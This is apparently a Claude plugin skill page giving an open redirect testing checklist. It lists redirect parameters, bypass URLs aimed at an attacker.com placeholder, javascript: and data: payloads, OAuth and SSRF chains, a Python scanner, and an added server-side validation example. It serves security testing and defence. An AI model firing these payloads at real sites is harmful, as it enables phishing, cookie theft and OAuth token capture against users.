From cybersec-toolkit
Provides a checklist for open redirect vulnerability testing: parameter identification, bypass techniques (URL encoding, CRLF injection), and chaining with OAuth/SSRF. For authorized security research.
How this skill is triggered — by the user, by Claude, or both

Slash command: `/cybersec-toolkit:offensive-open-redirect`

The summary Claude sees in its skill listing — used to decide when to auto-load this skill
- **Skill Name**: open-redirect
Open redirect vulnerability checklist: parameter identification, bypass techniques (URL encoding, double slashes, CRLF injection, protocol handlers), chaining with OAuth/SSRF, and impact escalation paths. Use for web app testing and bug bounty open redirect discovery.
Use this skill when the conversation involves any of:
open redirect, URL redirect, redirect bypass, URL encoding bypass, CRLF, protocol handler, redirect chain, OAuth redirect, SSRF chain, open redirection
When this skill is active:
Open redirect vulnerabilities occur when web applications improperly validate user-supplied URLs used for redirections. These vulnerabilities allow attackers to craft links that appear legitimate but redirect victims to malicious websites. When exploited, the victim initially connects to a trusted domain, giving the malicious link an appearance of legitimacy, before being redirected to an attacker-controlled destination.
```mermaid
sequenceDiagram
    participant Victim
    participant TrustedSite
    participant AttackerSite
    Victim->>TrustedSite: Click malicious link<br/>trusted.com/redirect?url=evil.com
    Note over TrustedSite: Inadequate URL validation
    TrustedSite->>Victim: HTTP 302 Redirect to evil.com
    Victim->>AttackerSite: Automatic redirect
    AttackerSite->>Victim: Malicious content
```
The core technical flaws leading to open redirects include:

- `javascript:` navigations from cross-origin contexts more, but many apps forward redirects to clients; validate server-side before emitting 3xx.
- `redirect_uri` match; test for partial/path-only allowlists and case/encoding mismatches.
- `intent:` URLs on Android and iOS universal link fallbacks.
- `SameSite=Lax` default affects redirect flows; test authentication state preservation.
- `no-referrer` or `strict-origin` may break redirect detection; test logging/analytics dependencies.

Open redirects can exist in various implementation patterns:

- Query-string parameters (`?redirect=`, `?url=`, `?next=`)
- Path segments (`/redirect/https://example.com`)

Identify Redirection Parameters:
```text
redirect, redirect_to, url, link, goto, return, returnTo, destination,
next, checkout, checkout_url, continue, return_path, return_url,
forward, path, redir, redirect_uri, view, img_url, image_url, load_url
```
Find Redirection Endpoints:
Search Code and Documentation:
Basic Open Redirect Testing:
```text
https://target.com/redirect?url=https://attacker.com
https://target.com/redirect?next=https://attacker.com
https://target.com/redirect?url=//attacker.com
https://target.com/redirect?url=/../redirect?url=https://attacker.com
```
Referer-Based Open Redirect Testing:
OAuth Redirect Testing:
```text
https://target.com/oauth/authorize?client_id=CLIENT_ID&redirect_uri=https://attacker.com
```
```mermaid
graph TD
    subgraph "Open Redirect Bypass Techniques"
        A[Validation Bypasses] --> B[Domain Spoofing]
        A --> C[Encoding Bypasses]
        A --> D[Protocol Confusion]
        A --> E[Path-Based Bypasses]
        A --> F[Special Character Abuse]
        B --> B1["target.com.attacker.com"]
        B --> B2["attacker.com?target.com"]
        C --> C1["URL Encoding: %68%74%74%70%73..."]
        C --> C2["Double Encoding"]
        D --> D1["javascript:alert(1)"]
        D --> D2["data:text/html;base64,..."]
        E --> E1["////attacker.com"]
        E --> E2["/\/attacker.com"]
        F --> F1["[email protected]"]
        F --> F2["attacker.com#target.com"]
    end
```
Domain spoofing:

```text
https://target.com/redirect?url=https://target.com.attacker.com
https://target.com/redirect?url=https://attacker.com?target.com
https://target.com/redirect?url=https://attackertarget.com
```

Encoding bypasses (single URL encoding, full hex encoding, and the double-encoded `%252F` style bypass):

```text
https://target.com/redirect?url=https%3A%2F%2Fattacker.com
https://target.com/redirect?url=%68%74%74%70%73%3a%2f%2f%61%74%74%61%63%6b%65%72%2e%63%6f%6d
```

Protocol confusion:

```text
https://target.com/redirect?url=javascript:alert(document.domain)
https://target.com/redirect?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
```

Path-based bypasses:

```text
https://target.com/redirect?url=https;/attacker.com
https://target.com/redirect?url=/\/attacker.com
https://target.com/redirect?url=////attacker.com
https://target.com/redirect?url=\/\/attacker.com/
```

Special character abuse:

```text
https://target.com/redirect?url=https://[email protected]
https://target.com/redirect?url=https://attacker.com#target.com
https://target.com/redirect?url=https://attacker.com\@target.com
```
Framework Redirector Vulnerabilities:

- `url` parameter: `/spring/login?url=https://attacker.com`
- `redirect()` helper: `/redirect?url=https://attacker.com`
- `res.redirect()` calls: `/login?redirect=https://attacker.com`
- Server Action redirect injection: `/api/action?redirect=https://attacker.com`
- `goto()` and `redirect()` manipulation (test in `hooks.server.ts`):

```text
/auth/callback?redirectTo=https://attacker.com
/login?redirectTo=https://attacker.com
/api/redirect?url=https://attacker.com
```
OAuth Implementation Vulnerabilities:

- `redirect_uri`: `/oauth/authorize?response_type=token&redirect_uri=https://attacker.com`
- `state` parameter handling: `/oauth/callback?code=ABC123&state=https://attacker.com`

Social Login Vulnerabilities:

```text
/login/facebook/callback?return_url=https://attacker.com
/auth/google/callback?redirect_uri=https://attacker.com
```
```mermaid
graph LR
    subgraph "Open Redirect Impact Scenarios"
        A[Open Redirect] --> B[Phishing Attacks]
        A --> C[CSRF Augmentation]
        A --> D[Advanced Attack Chains]
        B --> B1[Domain Credibility Abuse]
        B --> B2[Context-Aware Phishing]
        C --> C1[Redirect Chaining]
        C --> C2[Login CSRF]
        D --> D1[XSS via Redirect]
        D --> D2[SSRF via Redirect]
        D --> D3[OAuth Token Theft]
    end
```
XSS and SSRF via redirect:

```text
https://target.com/redirect?url=javascript:alert(document.cookie)
https://target.com/redirect?url=http://internal-service/admin
```
```python
import requests
from urllib.parse import urlparse


def test_open_redirect(target_url, redirect_param, payloads, target_domain):
    """Send each payload with redirects disabled and inspect the Location header."""
    for payload in payloads:
        test_url = f"{target_url}{redirect_param}={payload}"
        try:
            # Disable redirects so the raw 3xx response can be inspected
            response = requests.get(test_url, allow_redirects=False, timeout=10)
            if response.status_code in [301, 302, 303, 307, 308]:
                location = response.headers.get('Location', '')
                parsed = urlparse(location)
                # hostname strips userinfo and port and is lower-cased, so
                # "https://target.com@attacker.com" is compared as attacker.com;
                # compare exactly rather than by substring
                host = parsed.hostname or ''
                off_origin = host and host != target_domain
                # javascript: / data: Locations have no host but are still findings
                odd_scheme = parsed.scheme and parsed.scheme not in ('http', 'https')
                if off_origin or odd_scheme:
                    print(f"Potential Open Redirect: {test_url} -> {location}")
        except requests.RequestException as e:
            print(f"Error testing {test_url}: {e}")


# Target website
target_url = "https://target.com/redirect?"
target_domain = "target.com"
redirect_param = "url"

# Common bypass payloads
payloads = [
    "https://attacker.com",
    "//attacker.com",
    "https%3A%2F%2Fattacker.com",
    "/\\/attacker.com",
    "https://[email protected]",
    "https://target.com.attacker.com",
    "javascript:alert(document.domain)",
]

test_open_redirect(target_url, redirect_param, payloads, target_domain)
```
```mermaid
flowchart TD
    A[Open Redirect Testing Strategy] --> B[Discovery Phase]
    A --> C[Initial Testing]
    A --> D[Bypass Testing]
    A --> E[Exploitation]
    A --> F[Documentation]
    B --> B1[Map redirect functionality]
    B --> B2[Identify parameters]
    B --> B3[Review source code]
    C --> C1[Test basic payloads]
    C --> C2[Observe behavior]
    D --> D1[Test domain validation bypasses]
    D --> D2[Test encoding bypasses]
    E --> E1[Create PoC exploits]
    E --> E2[Chain with other vulnerabilities]
    F --> F1[Document vulnerable endpoints]
    F --> F2[Note successful bypasses]
```
Discovery Phase:
Initial Testing Phase:
```text
?redirect=https://attacker.com
?redirect=//attacker.com
?redirect=\/\/attacker.com
```
Bypass Testing Phase:
Exploitation Phase:
Documentation Phase:
```text
https://attacker.com
//attacker.com
%68%74%74%70%73%3a%2f%2f%61%74%74%61%63%6b%65%72%2e%63%6f%6d
```

Implement Proper Validation:
Use Indirect References:
Implement Safe Redirect Patterns:
Technical Controls:
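As an added example that is not part of the cybersec-toolkit skill, the following Python implements the server-side validation and indirect-reference patterns named in the headings above and checks them against the bypass payloads listed earlier on this page. `ALLOWED_HOSTS`, `REDIRECT_TOKENS`, `is_safe_redirect`, `safe_redirect_target` and `resolve_redirect_token` are names chosen for this example; `target.com` is the placeholder host used throughout the checklist, and the allowlist and token table are constructed.

```python
from urllib.parse import urlparse

# Hosts a redirect may point at. Exact matching only: "target.com.attacker.com"
# and "attackertarget.com" are different hosts and must not match.
# (Constructed allowlist; target.com is the checklist's placeholder host.)
ALLOWED_HOSTS = frozenset({"target.com", "www.target.com"})
DEFAULT_REDIRECT = "/"

# Indirect references: the client supplies a short token, never a URL.
# (Constructed mapping for this example.)
REDIRECT_TOKENS = {
    "account": "/account",
    "checkout": "https://www.target.com/checkout",
}


def is_safe_redirect(url, allowed_hosts=ALLOWED_HOSTS):
    """Return True only for a same-origin path or an absolute http(s) URL whose
    host is on the allowlist. Run this on the value the framework hands you,
    i.e. after its single round of query-string decoding."""
    if not isinstance(url, str) or not url:
        return False
    # Control characters cover CRLF injection into the Location header;
    # browsers treat backslashes as slashes, so "/\/attacker.com" is rejected here.
    if any(ord(ch) < 0x21 or ch == "\x7f" or ch == "\\" for ch in url):
        return False
    parsed = urlparse(url)
    if parsed.scheme == "" and parsed.netloc == "":
        # A relative path must start with exactly one slash: "////attacker.com"
        # parses with an empty netloc but browsers resolve it off-origin.
        return url.startswith("/") and not url.startswith("//")
    # Anything else must be http(s). This drops javascript:, data:, the bare
    # protocol-relative "//attacker.com" (empty scheme) and "https;/attacker.com".
    if parsed.scheme.lower() not in ("http", "https"):
        return False
    # Userinfo ("https://user@host") is never a legitimate redirect target here.
    if parsed.username is not None or parsed.password is not None:
        return False
    # hostname is lower-cased and has userinfo/port removed; drop a trailing dot.
    host = (parsed.hostname or "").rstrip(".")
    return host in allowed_hosts


def safe_redirect_target(url, fallback=DEFAULT_REDIRECT):
    """What a login handler should emit in Location: the validated URL or the fallback."""
    return url if is_safe_redirect(url) else fallback


def resolve_redirect_token(token, fallback=DEFAULT_REDIRECT):
    """Indirect-reference pattern: look the token up; unknown tokens use the fallback."""
    return REDIRECT_TOKENS.get(token, fallback)


if __name__ == "__main__":
    # Payloads from the checklist above; every one should resolve to the fallback.
    for p in ["https://attacker.com", "//attacker.com", "/\\/attacker.com",
              "////attacker.com", "https://target.com.attacker.com",
              "https://attacker.com?target.com", "javascript:alert(document.domain)",
              "https:attacker.com", "/account/settings"]:
        print(f"{p!r:45} -> {safe_redirect_target(p)}")
```

The validator deliberately has no subdomain wildcard; exact host matching is what defeats `target.com.attacker.com` and `attackertarget.com`, and a new legitimate host is added to the allowlist rather than matched by pattern. Relative paths on the same origin are accepted, so an application that also exposes another redirector on that origin (the `/../redirect?url=` chain shown earlier) should additionally refuse paths that point at its own redirect endpoints. Where the destination set is small, the token lookup removes the URL from the client entirely and is the simpler control.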
```shell
npx claudepluginhub 26zl/cybersec-toolkit --plugin cybersec-toolkit
```

Tests open redirect vulnerabilities by analyzing URL parameters, applying bypass techniques, and chaining exploits for phishing and token theft.
Identifies and tests open redirect vulnerabilities in web apps by analyzing URL parameters, bypass techniques like encoding and subdomain tricks, and phishing exploitation chains. Useful for login, OAuth, and SSO audits.